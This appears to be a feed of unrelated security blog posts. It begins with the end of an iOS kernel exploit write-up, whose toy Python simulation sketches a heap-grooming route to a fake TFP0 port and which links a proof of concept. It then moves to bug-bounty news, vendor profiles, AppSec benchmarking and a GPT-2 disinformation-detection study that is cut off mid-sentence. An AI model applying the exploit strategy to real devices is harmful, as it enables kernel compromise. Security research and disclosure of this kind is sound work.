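The seven steps above can be sketched as a toy heap-grooming simulation. This Python model is illustrative only: the slot indices, labels, and the `PREDICTED` constant are assumptions standing in for page-sized kalloc regions, not real kernel state.

```python
# Toy model of the spray / free / refill strategy from steps 1-7.
# Dict keys stand in for page-sized heap slots; values are what occupies them.

heap = {}
PREDICTED = 3  # index of the slot whose address we can predict after the spray

# Step 1: spray OSData (size 0x3FFF, so kmem_alloc_kobject is used).
for i in range(6):
    heap[i] = "OSDATA"

# Step 2: the arbitrary-release primitive frees the OSData at predicted_address.
del heap[PREDICTED]

# Step 3: a mach message carrying an ool_ports descriptor refills the hole.
heap[PREDICTED] = "MACH_MSG(ool_ports)"

# Step 4: releasing via IOSurface frees the slot while the message is still
# in flight, so the kernel's ool_ports pointer now dangles into the hole.
del heap[PREDICTED]

# Step 5: re-spray OSData carrying fake ipc_port/task structures into the hole.
heap[PREDICTED] = "FAKE_PORTS"

# Steps 6-7: receiving the message yields ports backed by our fake structures;
# after leaking kernel_map / ipc_space_kernel via pid_for_task, one final
# release-and-respray plants a fake TFP0 port in the same slot.
heap[PREDICTED] = "FAKE_TFP0"

assert heap[PREDICTED] == "FAKE_TFP0"   # the dangling ool_ports entry now
                                        # resolves to our fake TFP0 port
```

The key invariant the real exploit relies on is the same as in this sketch: the ool_ports pointer captured in step 3 never moves, so whatever is re-sprayed into that slot is what the kernel later interprets as a port.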

Proof of Concept

The PoC below is released for research purposes only; use at your own risk. It is available here: https://github.com/ZecOps/public/tree/master/ZecOps_FreeTheSandbox_iOS_PAC_TFP0_POC_BEQ_12_4_2

References

Bonus

If you read all the way to here, here’s a bonus:
To receive #FreeTheSandbox stickers delivered to you, fill out this form.

task_for_pwn@zecops.com public key below:

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
nuIgwms=
=WWrF
-----END PGP PUBLIC KEY BLOCK-----

Expanding the Android Security Rewards Program

The Android Security Rewards (ASR) program was created in 2015 to reward researchers who find and report security issues to help keep the Android ecosystem safe. Over the past four years, we have rewarded over 1,800 reports and paid out over four million dollars.

Today, we’re expanding the program and increasing reward amounts. We are introducing a top prize of $1 million for a full-chain remote code execution exploit with persistence that compromises the Titan M secure element on Pixel devices. Additionally, we are launching a program offering a 50% bonus for exploits found on specific developer preview versions of Android, meaning our top prize is now $1.5 million.

As mentioned in a previous blog post, in 2019 Gartner rated the Pixel 3 with Titan M as having the most “strong” ratings in the built-in security section out of all devices evaluated. This is why we’ve created a dedicated prize to reward researchers for exploits that circumvent the secure element’s protections.

In addition to exploits involving Pixel Titan M, we have added other categories of exploits to the rewards program, such as those involving data exfiltration and lockscreen bypass. These rewards go up to $500,000 depending on the exploit category. For full details, please refer to the Android Security Rewards Program Rules page.

Now that we’ve covered some of what’s new, let’s take a look back at some milestones from this year. Here are some highlights from 2019:

  • Total payouts in the last 12 months have been over $1.5 million.
  • Over 100 participating researchers have received an average reward amount of over $3,800 per finding (46% increase from last year). On average, this means we paid out over $15,000 (20% increase from last year) per researcher!
  • The top reward paid out in 2019 was $161,337.

Top Payout

The highest reward paid out to a member of the research community was for a report from Guang Gong (@oldfresher) of Alpha Lab, Qihoo 360 Technology Co. Ltd. It detailed the first reported 1-click remote code execution exploit chain on the Pixel 3 device. Guang Gong was awarded $161,337 from the Android Security Rewards program and $40,000 from the Chrome Rewards program, for a total of $201,337. The combined $201,337 reward is also the highest for a single exploit chain across all Google VRP programs. The Chrome vulnerabilities leveraged in this report were fixed in Chrome 77.0.3865.75, released in September, protecting users against this exploit chain.

We’d like to thank all of our researchers for contributing to the security of the Android ecosystem. If you’re interested in becoming a researcher, check out our Bughunter University for information on how to get started.

Starting today, November 21, 2019, the new rewards take effect. Any reports submitted before November 21, 2019 will be rewarded based on the previously existing rewards table.

Happy bug hunting!

5 Exciting players in the Breach and Attack Simulation (BAS) Cyber Security Category

Breach and Attack Simulation is a new concept that helps organizations evaluate their security posture in a continuous, automated, and repeatable way. This approach allows for the identification of imminent threats, provides recommended actions, and produces valuable metrics about cyber-risk levels. Breach and attack simulation is a fast-growing segment within the cybersecurity space, and it provides significant advantages over traditional security evaluation methods, including penetration testing and vulnerability assessments.

Going over the players in this industry, it is clear that the BAS category includes a number of different approaches, with the common goal of providing the customer with a clear picture of its actual vulnerabilities and how to mitigate them.

CyberDB has handpicked a number of exciting and emerging vendors for this blog. These players are (in alphabetical order):

These companies share a number of characteristics, including a very fast time to market, a successful management team, and strong traction. In addition, all of them have raised Series A or B funding over the last 16 months, ranging from $5M to $32M.

Other notable players, ranging from incumbents to emerging vendors, include Rapid7, Qualys, ThreatCare, AttackIQ, GuardiCore, SafeBreach, Verodin (recently acquired by FireEye), and WhiteHaX.

Gartner defines Breach & Attack Simulation (BAS) technologies as tools “that allow enterprises to continually and consistently simulate the full attack cycle (including insider threats, lateral movement, and data exfiltration) against enterprise infrastructure, using software agents, virtual machines, and other means”.

What makes BAS special is its ability to provide continuous and consistent testing at limited risk. It can be used to alert IT and business stakeholders about existing gaps in the security posture, or to validate that security infrastructure, configuration settings, and detection/prevention technologies are operating as intended. BAS can also help validate whether security operations and SOC staff can detect specific attacks when used as a complement to red team or penetration testing exercises.

CyberDB strongly recommends exploring BAS technologies as part of a modern cybersecurity technology stack.

Cymulate was founded by an elite team of former IDF intelligence officers who identified frustrating inefficiencies during their cyber security operations. From this came their mission to empower organizations worldwide and make advanced cyber security as simple and familiar as sending an e-mail. Since the company’s inception in 2016, Cymulate’s platform was given the recognition of “Cool Vendor” in Application and Data Security by Gartner in 2018 and has received dozens of industry awards to date. Today, Cymulate has offices in Israel, United States, United Kingdom, and Spain. The company has raised $11 million with backing from investors Vertex Ventures, Dell Technologies Capital, Susquehanna Growth Equity, and Eyal Gruner.

Cymulate is a SaaS-based breach and attack simulation platform that makes it simple to test, measure and optimize the effectiveness of your security controls any time, all the time. With just a few clicks, Cymulate challenges your security controls by initiating thousands of attack simulations, showing you exactly where you’re exposed and how to fix it—making security continuous, fast and part of every-day activities.

Fully automated and customizable, Cymulate challenges your security controls against the full attack kill chain with thousands of simulated threats, both common and novel. Testing both internal and external defenses, Cymulate shortens test cycles, provides 360° visibility and actionable reporting, and offers a continuous counter-breach assessment technology that empowers security leaders to take a proactive approach to their cyber stance, so they can stay one step ahead of attackers. Always.

With a Research Lab that keeps abreast of the very latest threats, Cymulate proactively challenges security controls against the full attack kill chain, allowing hyper-connected organizations to avert damage and stay safe.

Overtaking manual, periodic penetration testing and red teaming, breach and attack simulation is becoming the most effective method to prepare for and predict oncoming attacks. Security professionals realize that to cope with evolving attackers, a continuous and automated solution is essential to ensure optimal, non-stop security.

Cymulate is trusted by hundreds of companies worldwide, from small businesses to large enterprises, including leading banks and financial services. They share our vision—to make it easy for anyone to protect their company with the highest levels of security. Because the easier cybersecurity is, the more secure your company—and every company—will be.

Established in 2015 with offices in Israel, Boston, London and Zurich, Pcysys delivers an automated network penetration testing platform that assesses and helps reduce corporate cybersecurity risks. Hundreds of security professionals and service providers around the world use Pcysys to perform continuous, machine-based penetration tests that improve their immunity against cyber-attacks across their organizational networks. With over 60 enterprise global customers across all industries, Pcysys is the fastest-growing cybersecurity startup in Israel.

The Problem – Missing Cyber Defense Validation

We believe that penetration testing, as it is known today, is becoming obsolete. Traditionally, penetration testing has been performed manually by service firms, deploying expensive labor to uncover hidden vulnerabilities and produce lengthy reports, with little transparency along the way. Professional services-based penetration testing is limited in scope, time-consuming and costly. It represents a point-in-time snapshot, and cannot comply with the need for continuous security validation within a dynamic IT environment.

PenTera™ – One-Click Penetration Testing

Requiring no agents or pre-installations, Pcysys’s PenTera™ platform uses an algorithm to scan and ethically penetrate the network with the latest hacking techniques, prioritizing remediation efforts with a threat-facing perspective. The platform enables organizations to focus their resources on the remediation of the vulnerabilities that take part in a damaging “kill chain” without the need to chase down thousands of vulnerabilities that cannot be truly exploited towards data theft, encryption or service disruption.

Benefits

  • Continual vigilance – the greatest benefit of employing the PenTera platform is the ability to continually validate your security from an attacker’s perspective and grow your cyber resilience over time. Pen-testing is becoming a daily activity.
  • Reduce external testing costs – with PenTera, you can minimize cost and dependency on external risk validation providers. While in some cases an annual 3rd-party pen-test is still required for compliance reasons, it can be reduced in scope and spend.
  • Test against the latest threats – as the threat landscape evolves, it is crucial to incorporate the latest threats into your regular pen-testing practices. Your PenTera subscription assures you stay current.

Differentiators

  • Agentless – zero agent installations or network configurations.
  • Real Exploits, No Simulations – PenTera performs real-time ethical exploitations.
  • Automated – press ‘Play’ and get busy doing other things while the penetration test progresses.
  • Complete Attack Vector Visibility – every step in the attack vector is presented and reported in detail to explain the attack “kill chain”.

Company

Founded in 2014, Picus has more than 100 customers and is backed by EarlyBird, Social Capital, and ACT-VC. Headquartered in San Francisco, Picus has offices in London and Ankara to serve its global customer base.

Picus Security’s customers include leading mid-sized companies and enterprises, across LATAM, Europe, APAC and the Middle East regions.

Solution

Picus continuously validates your security operations to harden your defenses. Picus empowers organizations to identify imminent threats, take the most viable defense actions and help businesses understand cyber risks to make the right decisions.

Picus Security is one of the leading Breach and Attack Simulation (BAS) vendors featured in several Gartner reports such as BAS Market Report, Market Guide For Vulnerability Assessment and Hype Cycle for Threat Facing Technologies. Picus has recently been recognized as a Cool Vendor in Security and Risk Management, 2H19 by Gartner. Picus was distinguished as one of the top 10 innovative cyber startups by PwC and the most innovative Infosec Startup of the year by Cyber Defense Magazine.

Unlike penetration testing methods, Picus validates security effectiveness continuously and in a repeatable manner that is completely risk-free for production systems. This approach helps customers identify imminent threats, take action, and maintain a continuous view of actual risk. Picus customers also maximize ROI from existing security tools, get continuous metrics on their security level, and can demonstrate the positive impact of security investments to the business.

Picus provides measurable context about the descriptions, behavior, and methods of adversaries by running an extensive set of cyber threats and attack scenarios on a 24/7 basis, in production networks, on its fully risk-free, false-positive-free platform. Picus constantly assesses organizational readiness for adversarial actions, prioritizes findings based on adversarial context, and helps drive immediate action to mitigate imminent threats. Key elements of the platform include:

  1. An in-depth, full-coverage threat database with more than 7,600 real-world payloads, updated daily, plus adversary-based attack scenarios and techniques mapped to the MITRE ATT&CK framework, covering web application attacks, exploitation, malware, data exfiltration, and endpoint scenarios.
  2. More than 34,000 mitigation signatures and 10 security vendor partnerships, so analysts can gain insight into the most viable defense actions in response to adversaries, with immediate mitigation validation.
  3. Actionable remediation recommendations tailored to organizations and their defense stacks, focusing only on attacks that have mitigation solutions.

Randori’s mission is to build the world’s most authentic, automated attack platform, to help security teams “train how they fight”. Founded in 2018 by a former Carbon Black executive and leading red teamers, Randori provides a SaaS platform that allows security teams of all maturity levels to spar against an authentic adversary. Customers test their incident response, identify weaknesses (not just vulnerabilities), and, as a result, produce justifiable requests for further investment.

Randori is based in Waltham, MA with offices in Denver, CO. Known customers include Houghton Mifflin Harcourt, Greenhill & Co, Carbon Black, RapidDeploy, and ClickSoftware.

The Randori platform consists of two products, Recon and Attack.

Recon provides comprehensive attack surface management powered by black-box discovery. Customers can “see” how attackers perceive their company from the outside. This is especially useful for enterprise organizations with a changing network footprint, such as those undergoing M&A, high seasonality, or cloud migration. Their approach differs from “internet-wide scan” methods, which can produce false positives and are not actionable. Recon results are prioritized using a Target Temptation engine, which takes into account factors like known weaknesses, post-exploitation potential, and the cost of action to an attacker. Recon is available for free trial; a complimentary Recon report can be provided to any company with over 1,000 employees.

Attack provides authentic adversary emulation across all stages of the kill chain. Customers choose from objective-based runbooks that the platform will use to gain initial access, maintain persistence, and move laterally across the network. Risk is assessed across vulnerabilities, misconfigurations, and credentials—the same ways attackers breach companies. Attack is available to select early access partners and will broaden access in 2020.

The Randori differentiator is authenticity: to get started with their platform, only a single email address is needed to understand one’s attack surface and put it to the test. The platform seeks not to “validate existing controls” or “detection of MITRE ATT&CK techniques”, but help security teams train against a real adversary.

XM Cyber, a multi-award-winning breach and attack simulation (BAS) leader, was founded in 2016 by top security executives from the elite Israeli intelligence sector. XM Cyber’s core team is composed of highly skilled and experienced veterans of Israeli Intelligence with expertise in both offensive and defensive cyber security.

Headquartered in the Tel Aviv metro area, XM Cyber has offices in the US, UK, Israel and Australia, with global customers including leading financial institutions, critical infrastructure organizations, healthcare, manufacturers, and more.

HaXM by XM Cyber is the first BAS platform to simulate, validate and remediate attackers’ paths to your critical assets 24×7. HaXM’s automated purple teaming aligns red and blue teams to provide the full realistic advanced persistent threat (APT) experience on one hand while delivering vital prioritized actionable remediation on the other. Addressing real user behavior and exploits, the full spectrum of scenarios is aligned to your organization’s own network to expose blind spots and is executed using the most up-to-date attack techniques safely, without affecting network availability and user experience.

By continuously challenging the organizational network with XM Cyber’s platform, organizations gain clear visibility of the cyber risks, and an efficient, data-driven actionable remediation plan aimed at the most burning issues to fix.

  • The HaXM simulation and remediation platform continuously exposes attack vectors, from breach point to any organizational critical asset so you always know the attack vectors to your crown jewels.
  • The continuous loop of automated red teaming is completed by ongoing and prioritized actionable remediation of security gaps, so you know how to focus your resources on the most critical issues.
  • The platform addresses real user behavior, poor IT hygiene and security exploits to expose the most critical blind spots so that you improve your IT hygiene and practices.

Even when an organization has deployed and configured modern security controls, applied patches and refined policies, there is a plethora of ways hackers can still infiltrate the system and compromise critical assets. XM Cyber is the only one to address the crucial question for enterprises: “are my critical assets really secure?” XM Cyber provides the only solution on the market that actually simulates a real APT hacker automatically and continuously.

By automating sophisticated hacking tools and techniques and running them internally, XM Cyber allows you to see the impact a breach would have on your actual environment. And you can remediate gaps and strengthen security for your organization’s “crown jewels”, including your customer data, financial records, intellectual capital and other digital assets.

The post 5 Exciting players in the Breach and Attack Simulation (BAS) Cyber Security Category appeared first on CyberDB.

NIST Seeking Input on Updates to NICE Cybersecurity Workforce Framework

The National Initiative for Cybersecurity Education (NICE), led by the National Institute of Standards and Technology (NIST), is planning to update the NICE Cybersecurity Workforce Framework, NIST Special Publication 800-181. The public is invited to provide input by January 13, 2020, for consideration in the update. The list of topics below covers the major areas in which NIST is considering updates. Comments received by the deadline will be incorporated to the extent practicable. The resulting draft revision to the NICE Cybersecurity Workforce Framework (NICE Framework), once completed, also…

Something new from the Technology Partnerships Office

Patenting NIST technologies serves as a gateway to the commercialization of NIST innovations. Patents promote NIST’s critical mission, “To promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.” Quick and easy access to NIST patents increases the likelihood of forming partnerships and ultimately commercialization of NIST technology. Previously, access to NIST patent information was only available through the Federal Laboratories Consortium (FLC) website. The…

Stem Cells and AI: Better Together

One day in the future when you need medical care, someone will examine you, diagnose the problem, remove some of your body’s healthy cells, and then use them to grow a cure for your ailment. The therapy will be personalized and especially attuned to you and your body, your genes, and the microbes that live in your gut. This is the dream of modern medical science in the field of “regenerative medicine.” There are many obstacles standing between this dream and its implementation in real life, however. One obstacle is complexity. Cells often differ so much from one another and differ in so many…

Using Benchmarks to Make the Case for AppSec

In a recent Veracode webinar on the subject of making the business case for AppSec, Colin Domoney, DevSecOps consultant, introduced the idea of using benchmarking to rally the troops around your AppSec cause. He says, “What you can do is you can show where your organization sits relative to other organizations and then your peers. If you're lagging, that's probably a good reason to further invest. If you're leading, perhaps you can use that opportunity to catch up on some of your more ambitious projects. We use benchmarking quite frequently. It's quite a useful task to undertake.”

Ultimately, the value of benchmarks is two-fold: you can see, as Colin says, “where you’re lagging” and use that data to make the case for more budget. But it also strengthens your ask by giving it priorities and a clear road map. For instance, you could say, “we need more AppSec budget,” but your argument is more powerful if you can say, “OWASP’s maturity model recommends automating security testing,” or “most organizations in the retail industry are testing for security monthly.”

If you’re looking for some AppSec benchmarking data, we recommend considering the following:

OWASP’s OpenSAMM Maturity Model: OWASP’s Software Assurance Maturity Model (SAMM) is “an open framework to help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization. The resources provided by SAMM will aid in:

  • Evaluating an organization’s existing software security practices.
  • Building a balanced software security assurance program in well-defined iterations.
  • Demonstrating concrete improvements to a security assurance program.
  • Defining and measuring security-related activities throughout an organization.”

At the highest level, SAMM defines four critical business functions related to software development. Within each business function are three security practices, and within each practice there are three levels of maturity, each with related activities. For instance, under the business function “Verification,” there is a security practice called “Implementation review,” which has the following maturity levels:

  • Level one: “Opportunistically finding basic code-level vulnerabilities and other high-risk security issues.”
  • Level two: “Make implementation review during development more accurate and efficient through automation.”
  • Level three: “Mandate comprehensive implementation review process to discover language-level and application-specific risks.”

The model also goes into detail on each of the security activities, the success metrics, and more. There is also a related “How-To Guide” and “Quick Start Guide.”

Veracode’s Verified Program: We created Verified both to give customers a way to prove to their customers that security is a priority, and to give them a road map toward application security maturity, based on our own 10+ years of experience of what good AppSec looks like. Want to see how you stack up against a mature program? Take a look at the requirements for the highest Verified tier, the Verified Continuous level. If your program looks more like the Standard or Team levels, use that to make the case to grow your program, with a clear roadmap of what is entailed in taking your program to the next level.

Veracode State of Software Security (SOSS) report: Our annual report offers some valuable benchmarking data for your AppSec program. Because we are a SaaS platform, we are able to aggregate all our scan data and look at trends across industries, geographies, and development processes.

You can use the SOSS report to benchmark your program against all organizations, those in your industry, or those that are implementing practices that improve the state of their software security. For instance, this year’s report found that 80 percent of applications don’t contain any high-severity flaws. How do you measure up? In addition, we found that those who scan the most (260+ times per year) have 5x less security debt and improve their median time to remediation by 72 percent. How often are you scanning?

You can also use the SOSS report to measure your program and progress against your peers in your industry. For example, this year we found that most of the top 10 flaw categories show a lower prevalence among retailers compared to the cross-industry average. The exceptions to that rule are Credentials Management and, to a lesser extent, Code Injection. It’s possible these tie back to core functionality in retail applications: authenticating users and handling user input. If you’re in the retail industry, you’ve now got a solid starting point for vulnerability types to focus on. If you’re in the Government and Education sector, your peers are struggling with Cross-Site Scripting flaws; are you? And finally, those in the financial sector have the best fix rate among all industries at 76 percent. Does your fix rate compare favorably?

Learn more

To find out more about making the case for AppSec, check out our new guide, Building a Business Case for Expanding Your AppSec Program.

Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models

Information operations have flourished on social media in part because they can be conducted cheaply, are relatively low risk, have immediate global reach, and can exploit the type of viral amplification incentivized by platforms. Using networks of coordinated accounts, social media-driven information operations disseminate and amplify content designed to promote specific political narratives, manipulate public opinion, foment discord, or achieve strategic ideological or geopolitical objectives. FireEye’s recent public reporting illustrates the continually evolving use of social media as a vehicle for this activity, highlighting information operations supporting Iranian political interests such as one that leveraged a network of inauthentic news sites and social media accounts and another that impersonated real individuals and leveraged legitimate news outlets.

Identifying sophisticated activity of this nature often requires the subject matter expertise of human analysts. After all, such content is purposefully and convincingly manufactured to imitate authentic online activity, making it difficult for casual observers to properly verify. The actors behind such operations are not transparent about their affiliations, often undertaking concerted efforts to mask their origins through elaborate false personas and the adoption of other operational security measures. With these operations being intentionally designed to deceive humans, can we turn towards automation to help us understand and detect this growing threat? Can we make it easier for analysts to discover and investigate this activity despite the heterogeneity, high traffic, and sheer scale of social media?

In this blog post, we will illustrate an example of how the FireEye Data Science (FDS) team works together with FireEye’s Information Operations Analysis team to better understand and detect social media information operations using neural language models.

Highlights

  • A new breed of deep neural networks uses an attention mechanism to home in on patterns within text, allowing us to better analyze the linguistic fingerprints and semantic stylings of information operations using modern Transformer models.
  • By fine-tuning an open source Transformer known as GPT-2, we can detect social media posts being leveraged in information operations despite their syntactic differences to the model’s original training data.
  • Transfer learning from pre-trained neural language models lowers the barrier to entry for generating high-quality synthetic text at scale, and this has implications for the future of both red and blue team operations as such models become increasingly commoditized.

Background: Using GPT-2 for Transfer Learning

OpenAI’s updated Generative Pre-trained Transformer (GPT-2) is an open source deep neural network that was trained in an unsupervised manner on the causal language modeling task. The objective of this language modeling task is to predict the next word in a sentence from previous context, meaning that a trained model ends up being capable of language generation. If the model can predict the next word accurately, it can be used in turn to predict the following word, and so on until the model produces fully coherent sentences and paragraphs. Figure 1 depicts an example of language model (LM) predictions we generated using GPT-2. To generate text, single words are successively sampled from distributions of candidate words predicted by the model until it predicts an <|endoftext|> word, which signals the end of the generation.


Figure 1: An example GPT-2 generation prior to fine-tuning after priming the model with the phrase “It’s disgraceful that.”  
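The sampling loop just described can be sketched in a few lines. This is a toy illustration only: a hypothetical hand-built bigram table stands in for the conditional distribution that a real LM like GPT-2 would supply.

```python
import random

# Toy sketch of autoregressive generation: repeatedly sample the next word
# from a conditional distribution until an end-of-text marker appears.
# BIGRAMS is a made-up stand-in for a trained language model's predictions.
BIGRAMS = {
    "<|start|>": ["the"],
    "the": ["model", "sentence"],
    "model": ["produces", "predicts"],
    "produces": ["coherent"],
    "predicts": ["the"],
    "coherent": ["sentences"],
    "sentences": ["<|endoftext|>"],
    "sentence": ["<|endoftext|>"],
}

def generate(seed=0, max_words=20):
    rng = random.Random(seed)
    words, current = [], "<|start|>"
    for _ in range(max_words):
        current = rng.choice(BIGRAMS[current])  # sample one candidate next word
        if current == "<|endoftext|>":          # marker signals end of generation
            break
        words.append(current)
    return " ".join(words)

print(generate())
```

A real model replaces the lookup table with a learned distribution over tens of thousands of candidate words, but the control flow, predict, sample, repeat until `<|endoftext|>`, is the same.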

The quality of this synthetically generated text along with GPT-2’s state of the art accuracy on a host of other natural language processing (NLP) benchmark tasks is due in large part to the model’s improvements over prior 1) neural network architectures and 2) approaches to representing text. GPT-2 uses an attention mechanism to selectively focus the model on relevant pieces of text sequences and identify relationships between positionally distant words. In terms of architectures, Transformers use attention to decrease the time required to train on enormous datasets; they also tend to model lengthy text and scale better than other competing feedforward and recurrent neural networks. In terms of representing text, word embeddings were a popular way to initialize just the first layer of neural networks, but such shallow representations required being trained from scratch for each new NLP task and in order to deal with new vocabulary. GPT-2 instead pre-trains all the model’s layers using hierarchical representations, which better capture language semantics and are readily transferable to other NLP tasks and new vocabulary.

This transfer learning method is advantageous because it allows us to avoid starting from scratch for each and every new NLP task. In transfer learning, we start from a large generic model that has been pre-trained for an initial task where copious data is available. We then leverage the model’s acquired knowledge to train it further on a different, smaller dataset so that it excels at a subsequent, related task. This process of training the model further is referred to as fine-tuning, which involves re-learning portions of the model by adjusting its underlying parameters. Fine-tuning not only requires less data compared to training from scratch, but typically also requires less compute time and resources.

In this blog post, we will show how to perform transfer learning from a pre-trained GPT-2 model in order to better understand and detect information operations on social media. Transformers have shown that Attention is All You Need, but here we will also show that Attention is All They Need: while transfer learning may allow us to more easily detect information operations activity, it likewise lowers the barrier to entry for actors seeking to engage in this activity at scale.

Understanding Information Operations Activity Using Fine-Tuned Neural Generations

In order to study the thematic and linguistic characteristics of a common type of social media-driven information operations activity, we first fine-tuned an LM that could perform text generation. Since the pre-trained GPT-2 model's dataset consisted of 40+ GB of Internet text data extracted from 8+ million reputable web pages, its generations display relatively formal grammar, punctuation, and structure that corresponds to the text present within that original dataset (e.g. Figure 1). To make it appear like social media posts with their shorter length, informal grammar, erratic punctuation, and syntactic quirks including @mentions, #hashtags, emojis, acronyms, and abbreviations, we fine-tuned the pre-trained GPT-2 model on a new language modeling task using additional training data.

For the set of experiments presented in this blog post, this additional training data was obtained from the following open source datasets of identified accounts operated by Russia’s famed Internet Research Agency (IRA) “troll factory”:

  • NBCNews, over 200,000 tweets posted between 2014 and 2017 tied to IRA “malicious activity.”
  • FiveThirtyEight, over 1.8 million tweets associated with IRA activity between 2012 and 2018; we used accounts categorized as Left Troll, Right Troll, or Fearmonger.
  • Twitter Elections Integrity, almost 3 million tweets that were part of the influence effort by the IRA around the 2016 U.S. presidential election.
  • Reddit Suspicious Accounts, consisting of comments and submissions emanating from 944 accounts of suspected IRA origin.

After combining these four datasets, we sampled English-language social media posts from them to use as input for our fine-tuned LM. Fine-tuning experiments were carried out in PyTorch using the 355 million parameter pre-trained GPT-2 model from HuggingFace’s transformers library, and were distributed over up to 8 GPUs.

As opposed to other pre-trained LMs, GPT-2 conveniently requires minimal architectural changes and parameter updates in order to be fine-tuned on new downstream tasks. We simply processed social media posts from the above datasets through the pre-trained model, whose activations were then fed through adjustable weights into a linear output layer. The fine-tuning objective here was the same that GPT-2 was originally trained on (i.e. the language modeling task of predicting the next word, see Figure 1), except now its training dataset included text from social media posts. We also added the <|endoftext|> string as a suffix to each post to adapt the model to the shorter length of social media text, meaning posts were fed into the model according to:

“#Fukushima2015 Zaporozhia NPP can explode at any time
